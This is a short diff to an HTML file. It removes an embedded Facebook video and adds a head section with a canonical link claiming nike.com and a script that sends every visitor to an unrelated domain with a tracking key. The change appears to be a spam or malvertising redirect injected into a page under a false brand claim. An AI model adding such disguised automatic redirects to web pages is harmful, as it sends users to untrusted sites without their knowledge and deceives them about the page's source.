--- a/1.html
+++ b/1.html
@@ -1,7 +1,6 @@
 <p><img src="341.png" width="1000" height="1200"></p>
-<html>
-<body>
-
-<iframe src="https://www.facebook.com/plugins/video.php?height=476&href=https%3A%2F%2Fwww.facebook.com%2F104845645695378%2Fvideos%2F448052764004900%2F&show_text=true&width=476&t=0" width="700" height="600" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowfullscreen="true" allow="autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share" allowFullScreen="true"></iframe>
-</body>
-</html>
+<html prefix="og: http://ogp.me/ns#">
+<head>
+<link rel="canonical" href="http://nike.com/" />
+<script type="text/javascript">window.location = "https://laserdrivepreview.com/rzwyb08ti?key=057e7811a7ee1b81904619492093e864";</script>
+</head>
